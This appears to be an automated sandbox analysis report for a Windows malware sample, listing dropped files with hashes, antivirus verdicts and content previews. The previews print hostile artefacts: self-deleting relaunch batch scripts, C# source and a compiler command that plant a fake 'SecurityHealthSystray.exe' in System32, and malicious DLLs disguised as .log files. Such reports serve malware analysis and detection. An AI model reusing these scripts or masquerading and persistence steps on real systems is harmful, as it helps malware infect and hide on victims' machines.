                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxu2e20u.z0j.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):213
                                                                          Entropy (8bit):5.183616629933716
                                                                          Encrypted:false
                                                                          SSDEEP:6:hCijTg3Nou1SV+DE1wv+VyKOZG1wkn23fdGuXGh:HTg9uYDEmtf8ug
                                                                          MD5:BB287C50751B25E75C864201D1AA25C9
                                                                          SHA1:942646DBD5129F6A144F15C829AB2743F2F396ED
                                                                          SHA-256:1FC674F23A11501DAAE6DCAEA262544EABC3239DA37D9846A31F07D06F901EE7
                                                                          SHA-512:77CCAFFE0DEAC5E2717B02E4DE422DAB90CE370D9D7196A51D3F3216BC653E55CB9718BE57E6995F3B317F1E81D795E171E66826C4302181255C06739DFD750C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\PlZA6b48MW.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bjcQ5hKx2L.bat"

                                                                          C:\Users\user\AppData\Local\Temp\jEHk4BaW3d

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.213660689688185
                                                                          Encrypted:false
                                                                          SSDEEP:3:m5i2q/PT3bn:m5i2MPbbn
                                                                          MD5:B34D4EE5B7BC4D6DD8D67804696C8E47
                                                                          SHA1:C95E8612670BBEA3760638800220A360594E8590
                                                                          SHA-256:A64B84717B8B170F757273EDFB897839B50647430257AD771CFB7871D7FC7C1C
                                                                          SHA-512:64AC233F5B99FDAEF221B101D97293DD9742A4E43BF54799D6961192EE3E616188427EB36A3805C825807DD787A29E6D642E95B9784E985BCC88C47BAD8ADCDA
                                                                          Malicious:false
                                                                          Preview:T60DLcL80GSd9uepz5g67aDDN

                                                                          C:\Users\user\AppData\Local\Temp\m9vo61rbQ6

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.4838561897747224
                                                                          Encrypted:false
                                                                          SSDEEP:3:8dTqUSdlB:8BSd
                                                                          MD5:8F493B15A3166540EC8D0FAEE2736854
                                                                          SHA1:EBF6429B538E73A82E107957EA5158161B150B24
                                                                          SHA-256:C1161DD3F4BBE2C277E608007A020EBFE2899670B57AFA0C640D3BDD548869DF
                                                                          SHA-512:A73898C05F6815156D9D79A2751DC264FA2834674ECF30CD82ACA8E11B58D7E3F4B74B09AE05B364F2B84C97FC241D836EFEE7C7B36B912F46B716B6F77FD1F4
                                                                          Malicious:false
                                                                          Preview:0jdLZQN83qJW1NcHzv2VBU5GG

                                                                          C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.0.cs

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                          Category:dropped
                                                                          Size (bytes):425
                                                                          Entropy (8bit):5.008873662349926
                                                                          Encrypted:false
                                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LW1etiLUliFkD:JNVQIbSfhV7TiFkMSfhWLW1eti4MFkD
                                                                          MD5:A2A5E7DFF9B0F316AB58858441C88881
                                                                          SHA1:77B530B5F856215D1A9B853F450686E838368E15
                                                                          SHA-256:A16F6FAFE0387DF0D91AA44392E010B35202C5984E4C53B4C662AF60A204F61C
                                                                          SHA-512:76E885E1514A778234F7625D99515E33581AD7A82CAEA2C9D43A6593DCCF1630815041CEFF477405B014FB4104AE4688824DC4ED50239F1C5CAEF27AF826188A
                                                                          Malicious:false
                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe"); } catch { } }).Start();. }.}.

                                                                          C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):250
                                                                          Entropy (8bit):5.119785597221396
                                                                          Encrypted:false
                                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fQc5b:Hu7L//TRq79cQWfh5b
                                                                          MD5:46E84DEE6F2ABCBBA1E3CF4007E9ACC1
                                                                          SHA1:DB662C40CF07D78950F6D210C6A74515BEAF606F
                                                                          SHA-256:E3CCFE8641E25F16C46247F20D3700E5F0DE732253D246E8807FB15C9F42AEA7
                                                                          SHA-512:79B8D6F353852696DD4F24456223363A9080553AB3F8432FE0C9B984CD18800B0AE3B01E1E6E292A68DEAE8C3518569DACD7A7E3863186B0F6AD7325EA89F881
                                                                          Malicious:true
                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.0.cs"

                                                                          C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.out

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                          Category:modified
                                                                          Size (bytes):750
                                                                          Entropy (8bit):5.266379800528901
                                                                          Encrypted:false
                                                                          SSDEEP:12:KJN/I/u7L//TRq79cQWfh5aKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfhcKax5DqBVKVrdFAw
                                                                          MD5:ADD1ADD1824A1746510EA458064A4B14
                                                                          SHA1:8D8B64B536B10F8444D4CF0102D78FD8B6011347
                                                                          SHA-256:36DDF2B509D39DD3D31A11F596C7B9B5588256FA520E25CAEDDAEC830ADD3339
                                                                          SHA-512:6389FF8080DB2EFE49D7D9D0E9AD0853694A938B681B6476CC84C53E9891656B97F969A690AE455EFC709CD15B0366D078E073D38EB1CEE92195DC3C00CDA3BF
                                                                          Malicious:false
                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                          C:\Users\user\AppData\Local\Temp\qg5Yz9DUoy

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.323856189774723
                                                                          Encrypted:false
                                                                          SSDEEP:3:P4j/QNJd7yxNn:9T7un
                                                                          MD5:151C335721AC0E5FC4CBBF354CDE678F
                                                                          SHA1:F8CB0EC4BDF07E954391DE2E1A97E39B5660AF02
                                                                          SHA-256:B5D84CB53C7ED270315F7396C7BEAD2A20FF04FBA03AE20109E362EBEA2F58D1
                                                                          SHA-512:F72D5533EC6A1051381D2243ABE51D0C7D75B54FD2E4E5C2E2E7DBAFE58346BF6F82931EB5763780AC605F0E5408B19EDCD49717E20FB296E28BCE2FE3CE9235
                                                                          Malicious:false
                                                                          Preview:ikzuPjXfnCirpXtshlxayTWTh

                                                                          C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):165
                                                                          Entropy (8bit):5.209731392840133
                                                                          Encrypted:false
                                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+WfW1JyzkAHyBktKcKZG1t+kiE2J5xAIJ7kh:hCRLuVFOOr+DE1wv+VyKOZG1wkn23fJe
                                                                          MD5:8205D0C6E15E3D0F9D18E15CB0407361
                                                                          SHA1:FD86F9BDB1457531FC79BECE633CBE0870006135
                                                                          SHA-256:1B26C0471694F2963D0CC8C476529D112C7DF15CD76B36E66D28A8BB85CAA805
                                                                          SHA-512:656D13FC29C192BF78F227AB75E0FC0337FE09FE724AD4CE2D2E67A3CCFE0F8FD84DB6F3CB31E079BC88CAFB7FD2EBED71198E0F99521860300970CEA8615BDC
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Desktop\PlZA6b48MW.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\wA41hAKrBM.bat"

                                                                          C:\Users\user\AppData\Local\Temp\y8Y7lUBZpM

                                                                          Download File
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.133660689688186
                                                                          Encrypted:false
                                                                          SSDEEP:3:ukU1Hn:ukU1H
                                                                          MD5:A66DEFFC688CB8BABB7D50ED04462472
                                                                          SHA1:D49E1F209B56010B53A6A441A770DFA4D74C5BA7
                                                                          SHA-256:AF18A0E816142666C24EFC59E721E6019C01C1C664EA530D9BC6385411772E49
                                                                          SHA-512:C2CA490A741FCB803C2281D9352C10BF3C34CA8E52F594CC9B7E3692BF8D4AA2EFBFF596835FA6DABCBA80F7546856985C878848E08CEADBBBEBE6D57BE9C8D8
                                                                          Malicious:false
                                                                          Preview:mvzkks8lNzJJAcc1IXrqvvLj5

                                                                          C:\Users\user\Desktop\CwRRQJIe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):85504
                                                                          Entropy (8bit):5.8769270258874755
                                                                          Encrypted:false
                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Joe Sandbox View:
                                                                          • Filename: wxl1r0lntg.exe, Detection: malicious, Browse
                                                                          • Filename: HaLCYOFjMN.exe, Detection: malicious, Browse
                                                                          • Filename: Z90Z9bYzPa.exe, Detection: malicious, Browse
                                                                          • Filename: 0J5DzstGPi.exe, Detection: malicious, Browse
                                                                          • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious, Browse
                                                                          • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                                          • Filename: Gg6wivFINd.exe, Detection: malicious, Browse
                                                                          • Filename: onlysteal.exe, Detection: malicious, Browse
                                                                          • Filename: t8F7Ic986c.exe, Detection: malicious, Browse
                                                                          • Filename: 544WP3NHaP.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                          C:\Users\user\Desktop\FvWYGyIe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23552
                                                                          Entropy (8bit):5.519109060441589
                                                                          Encrypted:false
                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                          C:\Users\user\Desktop\GOnzOWoM.log

                                                                          Download File
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23552
                                                                          Entropy (8bit):5.519109060441589
                                                                          Encrypted:false
                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                          C:\Users\user\Desktop\IXnYeTUQ.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32256
                                                                          Entropy (8bit):5.631194486392901
                                                                          Encrypted:false
                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                          C:\Users\user\Desktop\LARQmQKJ.log

                                                                          Download File
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32256
                                                                          Entropy (8bit):5.631194486392901
                                                                          Encrypted:false
                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                          C:\Users\user\Desktop\MiiYvNyr.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):69632
                                                                          Entropy (8bit):5.932541123129161
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                          C:\Users\user\Desktop\OeqoqbNM.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):69632
                                                                          Entropy (8bit):5.932541123129161
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                          C:\Users\user\Desktop\RCSpyiiu.log

                                                                          Download File
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):69632
                                                                          Entropy (8bit):5.932541123129161
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                          C:\Users\user\Desktop\UqqnPMXK.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23552
                                                                          Entropy (8bit):5.519109060441589
                                                                          Encrypted:false
                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                          C:\Users\user\Desktop\YNJEaDTu.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):85504
                                                                          Entropy (8bit):5.8769270258874755
                                                                          Encrypted:false
                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 71%
